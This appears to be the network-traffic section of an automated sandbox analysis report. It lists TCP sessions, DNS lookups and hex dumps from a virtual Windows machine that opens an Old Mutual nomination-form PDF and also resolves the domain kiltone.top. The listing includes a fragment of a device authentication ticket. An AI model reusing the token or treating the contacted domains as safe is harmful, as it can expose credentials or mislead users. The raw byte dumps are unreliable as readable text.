                                                                                                                                                Dec 16, 2024 09:54:34.947789907 CET49734443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:54:34.947805882 CET4434973420.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:34.948178053 CET4434973420.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:34.949779034 CET49734443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:54:34.949837923 CET49734443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:54:34.949843884 CET4434973420.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:34.950316906 CET49734443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:54:34.991339922 CET4434973420.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:35.496789932 CET4434973420.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:35.496906996 CET4434973420.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:35.496967077 CET49734443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:54:35.497098923 CET49734443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:54:35.497117996 CET4434973420.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:59.027136087 CET49736443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:54:59.027179956 CET4434973620.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:59.027240992 CET49736443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:54:59.027944088 CET49736443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:54:59.027961016 CET4434973620.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:55:01.245172977 CET4434973620.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:55:01.245309114 CET49736443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:55:01.316724062 CET49736443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:55:01.316795111 CET4434973620.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:55:01.317142963 CET4434973620.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:55:01.340516090 CET49736443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:55:01.340563059 CET49736443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:55:01.340580940 CET4434973620.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:55:01.340662003 CET49736443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:55:01.383375883 CET4434973620.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:55:01.886111975 CET4434973620.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:55:01.886609077 CET4434973620.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:55:01.886681080 CET49736443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:55:01.888736963 CET49736443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:55:01.888753891 CET4434973620.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:55:01.888772011 CET49736443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:55:06.288621902 CET49738443192.168.2.12142.250.181.68
                                                                                                                                                Dec 16, 2024 09:55:06.288665056 CET44349738142.250.181.68192.168.2.12
                                                                                                                                                Dec 16, 2024 09:55:06.289057970 CET49738443192.168.2.12142.250.181.68
                                                                                                                                                Dec 16, 2024 09:55:06.289314032 CET49738443192.168.2.12142.250.181.68
                                                                                                                                                Dec 16, 2024 09:55:06.289326906 CET44349738142.250.181.68192.168.2.12
                                                                                                                                                Dec 16, 2024 09:55:07.984294891 CET44349738142.250.181.68192.168.2.12
                                                                                                                                                Dec 16, 2024 09:55:07.984755039 CET49738443192.168.2.12142.250.181.68
                                                                                                                                                Dec 16, 2024 09:55:07.984782934 CET44349738142.250.181.68192.168.2.12
                                                                                                                                                Dec 16, 2024 09:55:07.985187054 CET44349738142.250.181.68192.168.2.12
                                                                                                                                                Dec 16, 2024 09:55:07.986320019 CET49738443192.168.2.12142.250.181.68
                                                                                                                                                Dec 16, 2024 09:55:07.986407042 CET44349738142.250.181.68192.168.2.12
                                                                                                                                                Dec 16, 2024 09:55:08.053071976 CET49738443192.168.2.12142.250.181.68
                                                                                                                                                Dec 16, 2024 09:55:17.677941084 CET44349738142.250.181.68192.168.2.12
                                                                                                                                                Dec 16, 2024 09:55:17.678016901 CET44349738142.250.181.68192.168.2.12
                                                                                                                                                Dec 16, 2024 09:55:17.678061008 CET49738443192.168.2.12142.250.181.68
                                                                                                                                                Dec 16, 2024 09:55:18.247714996 CET49738443192.168.2.12142.250.181.68
                                                                                                                                                Dec 16, 2024 09:55:18.247776031 CET44349738142.250.181.68192.168.2.12
                                                                                                                                                Dec 16, 2024 09:55:34.197837114 CET49751443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:55:34.197901964 CET4434975120.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:55:34.197973013 CET49751443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:55:34.198569059 CET49751443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:55:34.198585033 CET4434975120.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:55:36.425911903 CET4434975120.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:55:36.426023006 CET49751443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:55:36.427835941 CET49751443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:55:36.427850008 CET4434975120.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:55:36.428689003 CET4434975120.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:55:36.429975033 CET49751443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:55:36.430037975 CET49751443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:55:36.430044889 CET4434975120.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:55:36.430165052 CET49751443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:55:36.475326061 CET4434975120.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:55:36.976887941 CET4434975120.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:55:36.977013111 CET4434975120.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:55:36.977061033 CET49751443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:55:36.980487108 CET49751443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:55:36.980511904 CET4434975120.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:56:06.350709915 CET49826443192.168.2.12142.250.181.68
                                                                                                                                                Dec 16, 2024 09:56:06.350759983 CET44349826142.250.181.68192.168.2.12
                                                                                                                                                Dec 16, 2024 09:56:06.350919962 CET49826443192.168.2.12142.250.181.68
                                                                                                                                                Dec 16, 2024 09:56:06.351311922 CET49826443192.168.2.12142.250.181.68
                                                                                                                                                Dec 16, 2024 09:56:06.351325989 CET44349826142.250.181.68192.168.2.12
                                                                                                                                                Dec 16, 2024 09:56:08.042347908 CET44349826142.250.181.68192.168.2.12
                                                                                                                                                Dec 16, 2024 09:56:08.084525108 CET49826443192.168.2.12142.250.181.68
                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Dec 16, 2024 09:54:03.076950073 CET6178853192.168.2.121.1.1.1
                                                                                                                                                Dec 16, 2024 09:54:03.077095985 CET6270053192.168.2.121.1.1.1
                                                                                                                                                Dec 16, 2024 09:54:03.197896004 CET53568131.1.1.1192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:03.216809034 CET53549681.1.1.1192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:04.080653906 CET53617881.1.1.1192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:04.080852985 CET53627001.1.1.1192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:05.965554953 CET53548771.1.1.1192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.230524063 CET6059153192.168.2.121.1.1.1
                                                                                                                                                Dec 16, 2024 09:54:06.230803967 CET6147253192.168.2.121.1.1.1
                                                                                                                                                Dec 16, 2024 09:54:06.368151903 CET53605911.1.1.1192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:06.368844986 CET53614721.1.1.1192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:09.203160048 CET5477453192.168.2.121.1.1.1
                                                                                                                                                Dec 16, 2024 09:54:09.607387066 CET53547741.1.1.1192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:23.349920988 CET53596131.1.1.1192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:42.379194975 CET53526431.1.1.1192.168.2.12
                                                                                                                                                Dec 16, 2024 09:55:01.813304901 CET53500521.1.1.1192.168.2.12
                                                                                                                                                Dec 16, 2024 09:55:05.426611900 CET53560711.1.1.1192.168.2.12
                                                                                                                                                Dec 16, 2024 09:55:35.285660982 CET53637691.1.1.1192.168.2.12
                                                                                                                                                TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                Dec 16, 2024 09:55:09.036945105 CET192.168.2.121.1.1.14d5aEcho
                                                                                                                                                Dec 16, 2024 09:55:09.173260927 CET1.1.1.1192.168.2.12555aEcho Reply
                                                                                                                                                Dec 16, 2024 09:55:23.751044989 CET192.168.2.121.1.1.14d59Echo
                                                                                                                                                Dec 16, 2024 09:55:23.887456894 CET1.1.1.1192.168.2.125559Echo Reply
                                                                                                                                                Dec 16, 2024 09:55:28.630929947 CET192.168.2.121.1.1.14d58Echo
                                                                                                                                                Dec 16, 2024 09:55:28.768913984 CET1.1.1.1192.168.2.125558Echo Reply
                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                Dec 16, 2024 09:54:03.076950073 CET192.168.2.121.1.1.10x4099Standard query (0)www.oldmutual.co.zaA (IP address)IN (0x0001)false
                                                                                                                                                Dec 16, 2024 09:54:03.077095985 CET192.168.2.121.1.1.10x9260Standard query (0)www.oldmutual.co.za65IN (0x0001)false
                                                                                                                                                Dec 16, 2024 09:54:06.230524063 CET192.168.2.121.1.1.10x1293Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                Dec 16, 2024 09:54:06.230803967 CET192.168.2.121.1.1.10xed3bStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                Dec 16, 2024 09:54:09.203160048 CET192.168.2.121.1.1.10x9d27Standard query (0)kiltone.topA (IP address)IN (0x0001)false
                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                Dec 16, 2024 09:54:04.080653906 CET1.1.1.1192.168.2.120x4099No error (0)www.oldmutual.co.zad12y248af9ueom.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Dec 16, 2024 09:54:04.080653906 CET1.1.1.1192.168.2.120x4099No error (0)d12y248af9ueom.cloudfront.net108.158.75.80A (IP address)IN (0x0001)false
                                                                                                                                                Dec 16, 2024 09:54:04.080653906 CET1.1.1.1192.168.2.120x4099No error (0)d12y248af9ueom.cloudfront.net108.158.75.9A (IP address)IN (0x0001)false
                                                                                                                                                Dec 16, 2024 09:54:04.080653906 CET1.1.1.1192.168.2.120x4099No error (0)d12y248af9ueom.cloudfront.net108.158.75.99A (IP address)IN (0x0001)false
                                                                                                                                                Dec 16, 2024 09:54:04.080653906 CET1.1.1.1192.168.2.120x4099No error (0)d12y248af9ueom.cloudfront.net108.158.75.92A (IP address)IN (0x0001)false
                                                                                                                                                Dec 16, 2024 09:54:04.080852985 CET1.1.1.1192.168.2.120x9260No error (0)www.oldmutual.co.zad12y248af9ueom.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Dec 16, 2024 09:54:06.368151903 CET1.1.1.1192.168.2.120x1293No error (0)www.google.com142.250.181.68A (IP address)IN (0x0001)false
                                                                                                                                                Dec 16, 2024 09:54:06.368844986 CET1.1.1.1192.168.2.120xed3bNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                Dec 16, 2024 09:54:09.607387066 CET1.1.1.1192.168.2.120x9d27No error (0)kiltone.top45.125.67.168A (IP address)IN (0x0001)false
                                                                                                                                                • www.oldmutual.co.za
                                                                                                                                                • https:
                                                                                                                                                • kiltone.top
                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                0192.168.2.124970920.198.119.84443
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-16 08:53:55 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 42 63 6f 7a 39 59 76 58 49 45 43 4c 69 4b 2b 4f 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 33 61 63 65 39 39 35 63 32 37 38 33 34 38 38 0d 0a 0d 0a
                                                                                                                                                Data Ascii: CNT 1 CON 305MS-CV: Bcoz9YvXIECLiK+O.1Context: e3ace995c2783488
                                                                                                                                                2024-12-16 08:53:55 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                2024-12-16 08:53:55 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 42 63 6f 7a 39 59 76 58 49 45 43 4c 69 4b 2b 4f 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 33 61 63 65 39 39 35 63 32 37 38 33 34 38 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 56 53 54 48 6b 76 4f 78 66 46 71 49 32 55 72 6f 50 5a 68 65 77 65 55 46 53 6e 46 46 57 6b 46 35 74 43 7a 34 55 62 68 59 42 75 31 64 62 57 64 48 67 69 66 7a 72 44 51 43 57 46 6c 59 45 51 6b 36 4b 65 56 76 52 73 31 77 2f 44 46 32 4b 55 34 4d 33 68 4e 50 39 41 38 6e 39 74 65 73 66 6c 76 4e 76 4e 2f 41 6a 38 35 35 69 44 57 70 61
                                                                                                                                                Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: Bcoz9YvXIECLiK+O.2Context: e3ace995c2783488<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAVSTHkvOxfFqI2UroPZheweUFSnFFWkF5tCz4UbhYBu1dbWdHgifzrDQCWFlYEQk6KeVvRs1w/DF2KU4M3hNP9A8n9tesflvNvN/Aj855iDWpa
                                                                                                                                                2024-12-16 08:53:55 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 42 63 6f 7a 39 59 76 58 49 45 43 4c 69 4b 2b 4f 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 33 61 63 65 39 39 35 63 32 37 38 33 34 38 38 0d 0a 0d 0a
                                                                                                                                                Data Ascii: BND 3 CON\QOS 56MS-CV: Bcoz9YvXIECLiK+O.3Context: e3ace995c2783488
                                                                                                                                                2024-12-16 08:53:55 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                Data Ascii: 202 1 CON 58
                                                                                                                                                2024-12-16 08:53:55 UTC58INData Raw: 4d 53 2d 43 56 3a 20 62 76 6e 39 7a 6f 51 73 63 55 6d 69 53 58 35 33 72 51 67 65 6d 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                Data Ascii: MS-CV: bvn9zoQscUmiSX53rQgemw.0Payload parsing failed.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                1192.168.2.1249717108.158.75.804432856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-16 08:54:05 UTC778OUTGET /v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf HTTP/1.1
                                                                                                                                                Host: www.oldmutual.co.za
                                                                                                                                                Connection: keep-alive
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-12-16 08:54:06 UTC1063INHTTP/1.1 200 OK
                                                                                                                                                Content-Type: application/pdf
                                                                                                                                                Content-Length: 313058
                                                                                                                                                Connection: close
                                                                                                                                                Content-Disposition: inline; filename=Superfund_Beneficiary_Nomination_form.pdf
                                                                                                                                                Fastly-Io-Error: not a supported image format
                                                                                                                                                Fastly-Io-Served-By: vpop-etou8240196
                                                                                                                                                Fastly-Stats: io=1
                                                                                                                                                Server: contentstack
                                                                                                                                                X-Contentstack-Organization: blt2c31cdce6d24f06c
                                                                                                                                                X-Request-Id: 153d77aac8426bfb4b8c4c3c0751c407
                                                                                                                                                X-Runtime: 105ms
                                                                                                                                                Via: 1.1 varnish, 1.1 varnish, 1.1 28faeddd0f2a66ea58334f6c438c3c2c.cloudfront.net (CloudFront)
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Sat, 14 Dec 2024 12:59:38 GMT
                                                                                                                                                X-Served-By: cache-ams21052-AMS, cache-fjr990022-FJR
                                                                                                                                                X-Cache-Hits: 5, 0
                                                                                                                                                X-Timer: S1734181179.578163,VS0,VE125
                                                                                                                                                Access-Control-Expose-Headers: content-disposition, content-type, cache-control, status, content-length
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                Strict-Transport-Security: max-age=31557600
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                X-Amz-Cf-Pop: BAH53-P2
                                                                                                                                                X-Amz-Cf-Id: 1OTVvsptqI_zImK-_JXR5sv2D-o7knHg6yvj8eUqarDbTkuC3vS-Hw==
                                                                                                                                                Age: 158068
                                                                                                                                                2024-12-16 08:54:06 UTC16384INData Raw: 25 50 44 46 2d 31 2e 36 0d 25 e2 e3 cf d3 0d 0a 31 31 39 36 20 30 20 6f 62 6a 0d 3c 3c 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 46 69 72 73 74 20 34 31 38 2f 4c 65 6e 67 74 68 20 33 36 38 31 2f 4e 20 34 36 2f 54 79 70 65 2f 4f 62 6a 53 74 6d 3e 3e 73 74 72 65 61 6d 0d 0a 68 de cc 5a 7b 6f 1b 39 92 ff 2a 0d dc 1f 9b e0 30 62 37 9f 4d 60 11 40 b1 9d 19 df c6 76 2e 76 2e 37 d3 10 16 6d a9 6d 37 46 52 6b 5b ad 4c 7c 9f fe 7e 45 16 65 f9 19 27 13 4c 16 86 c4 57 55 b1 aa 58 2f d2 f2 b6 cc f2 cc 5b 9f 49 6d 32 6f 5c e6 a4 45 6b b3 52 62 de 60 ae c0 d8 a9 ac c8 1d 06 ae c8 0a 53 52 47 66 32 2f a8 93 67 52 5a 09 1a 98 31 04 6c 8b 4c 5a 55 a2 e3 d0 d1 0e 1d 9b 49 e7 08 46 a1 53 16 e8 00 ab 54 0a 3b f8 4c e9 02 33 a6 cc 94 75 c4 8b c9 94 93 00 76
                                                                                                                                                Data Ascii: %PDF-1.6%1196 0 obj<</Filter/FlateDecode/First 418/Length 3681/N 46/Type/ObjStm>>streamhZ{o9*0b7M`@v.v.7mm7FRk[L|~Ee'LWUX/[Im2o\EkRb`SRGf2/gRZ1lLZUIFST;L3uv
                                                                                                                                                2024-12-16 08:54:06 UTC16384INData Raw: 27 06 fe bc d0 63 0f 61 5d 5e 56 70 d7 b5 de 4e bb 2e 2f 2b 56 fb 86 cb cb 8a ed 9d b3 2e 2f 2b b6 17 ae ba bc ac d8 5e b8 ea d2 b2 62 fb 6d e4 fe 1a 71 50 56 cc 5f 10 7c 5a 56 22 e6 95 f3 0d 15 71 55 7c 14 d4 ba c2 0b e2 69 59 59 27 5e f3 01 7e 1a 4d 63 d7 38 34 ba c6 d0 38 35 a6 c6 d2 28 3c 13 9e 09 cf 84 67 0f 75 22 46 7c a1 6c 55 3f 6d ac 6e 1a bb c6 a1 d1 35 86 c6 a9 31 35 d6 43 09 59 4f 0b 11 9e 1b 75 9f cd cf 16 6f 4b ba 97 74 2f e9 5e d2 bd 4c 2a 98 54 30 a9 60 52 c1 f2 fc d1 b7 25 0f 97 3c 5c f2 70 c9 c3 25 0f 97 3c 5c f2 70 c9 c3 d5 0e 0c bb cd 25 3f 2f f9 79 29 6e 4b 71 5b 8a db 52 dc 96 e2 b6 14 b7 b5 8e d0 55 e5 b3 84 aa de 92 ea 2d a9 de 92 ea 2d a9 de 92 a5 6c 38 15 91 73 e8 ea 0a a9 ae 90 ea 0a a9 ae 90 29 54 f5 a2 54 2f 4a f5 a2 2c 3b 42
                                                                                                                                                Data Ascii: 'ca]^VpN./+V./+^bmqPV_|ZV"qU|iYY'^~Mc8485(<gu"F|lU?mn515CYOuoKt/^L*T0`R%<\p%<\p%?/y)nKq[RU--l8s)TT/J,;B
                                                                                                                                                2024-12-16 08:54:06 UTC16384INData Raw: 64 3a 33 35 38 33 63 35 35 31 2d 36 38 30 37 2d 39 37 34 31 2d 39 63 66 30 2d 36 38 32 64 62 35 31 38 31 35 33 65 3c 2f 78 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3e 0a 20 20 20 20 20 20 20 20 20 3c 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 69 6e 64 64 3a 63 33 36 35 33 35 39 65 2d 35 62 35 66 2d 31 31 64 64 2d 39 31 65 30 2d 62 30 65 61 30 30 65 31 37 65 62 64 3c 2f 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3e 0a 20 20 20 20 20 20 20 20 20 3c 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3e 78 6d 70 2e 69 64 3a 32 65 34 64 31 30 61 38 2d 38 31 34 31 2d 34 31 64 35 2d 38 35 38 37 2d 33 62 33 32 39 33 34 62 66 38 66 65 3c 2f 78 6d 70 4d 4d 3a 44 6f 63
                                                                                                                                                Data Ascii: d:3583c551-6807-9741-9cf0-682db518153e</xmpMM:InstanceID> <xmpMM:OriginalDocumentID>adobe:docid:indd:c365359e-5b5f-11dd-91e0-b0ea00e17ebd</xmpMM:OriginalDocumentID> <xmpMM:DocumentID>xmp.id:2e4d10a8-8141-41d5-8587-3b32934bf8fe</xmpMM:Doc
                                                                                                                                                2024-12-16 08:54:06 UTC11610INData Raw: 99 79 52 dd 63 8a 3e cf df 5e f0 78 ee 49 23 b8 9d 4f 35 4e f3 2c f6 47 ef 2d 34 72 50 1f 28 f5 f0 66 0a 6e 2f 12 00 8f 9f ee 30 6e 45 61 20 25 fb cc 74 cb 50 4a 66 fe 1b 15 27 78 1e f4 7e d4 84 c5 12 22 2d c6 e8 e6 23 97 47 8a c5 31 7d 0c ad c2 c6 2b 02 9d 15 ed 20 c3 79 73 13 52 3a 80 16 15 93 0d a0 05 d0 35 13 1e 4d 56 59 c6 62 31 ad 0b 31 54 c4 7e 83 8f 52 44 da df 4b 06 30 03 a6 90 2e 35 8d e1 09 7b 55 11 aa 88 af 2a 49 b5 d5 c9 52 23 8d a0 27 eb 1e 5b 1f c5 15 b6 1e bf 8f 2e 35 33 ff bd a1 58 ee 82 2e 55 ab b0 00 b5 62 15 e2 c0 2e 35 b2 c7 d7 14 e0 16 da bb 3e 8a 62 ea b0 30 8a f8 20 3c 2b d8 ef 29 46 74 bf 65 06 d0 25 50 84 20 4e 56 f0 89 5d b1 23 45 94 f0 9c c0 33 ef b7 ca 87 b6 50 fb 7d 95 3c 08 cc 06 93 e5 3c e8 43 48 d1 fe 0d 95 8c 78 fa 51 7d
                                                                                                                                                Data Ascii: yRc>^xI#O5N,G-4rP(fn/0nEa %tPJf'x~"-#G1}+ ysR:5MVYb11T~RDK0.5{U*IR#'[.53X.Ub.5>b0 <+)Fte%P NV]#E3P}<<CHxQ}
                                                                                                                                                2024-12-16 08:54:06 UTC16384INData Raw: b6 81 dd 5a 9c c0 fb 2d 30 2a 8c c6 e4 0f a8 78 48 d1 32 e3 ca 32 fc 12 eb 62 27 b5 01 87 0d a5 c9 ae 47 18 e9 50 25 84 b5 96 26 69 e7 db 20 e6 b0 3a d6 d9 79 c5 cd af 33 f3 8a 97 57 bc cd 58 9f a5 ca d9 bc dd 13 6a 78 f4 91 96 45 9b 64 9e aa ad 6d 6a f1 ba da eb e6 07 ea e3 e5 e5 f0 d2 96 32 93 c9 2c e6 99 7c ce 68 af 4d ea 28 b5 94 4b 16 8b 2e b7 cc 5b 1f 89 6c 35 76 61 8e 12 7a da 23 74 89 18 c8 e0 0d 03 68 78 49 98 d4 16 e3 be 2a 9c 54 23 f8 69 9c 2d ac 58 18 34 b3 09 65 04 b6 06 8a f8 63 7c 80 9f d0 50 74 c7 ab 0f 47 02 99 12 97 58 b3 16 c9 c1 ca d2 77 71 81 75 72 b1 45 3b bb cd 03 47 5a fd fe de 68 74 e2 85 17 4c 26 5b b5 64 8f c6 c0 da 75 ee 5c 97 fc 8f 6a 5b 21 ab 5d 18 67 b1 0e f9 56 47 2a 03 36 01 70 f3 8a e0 c4 f3 3c 04 21 6d b8 f8 d8 eb 24 7d
                                                                                                                                                Data Ascii: Z-0*xH22b'GP%&i :y3WXjxEdmj2,|hM(K.[l5vaz#thxI*T#i-X4ec|PtGXwqurE;GZhtL&[du\j[!]gVG*6p<!m$}
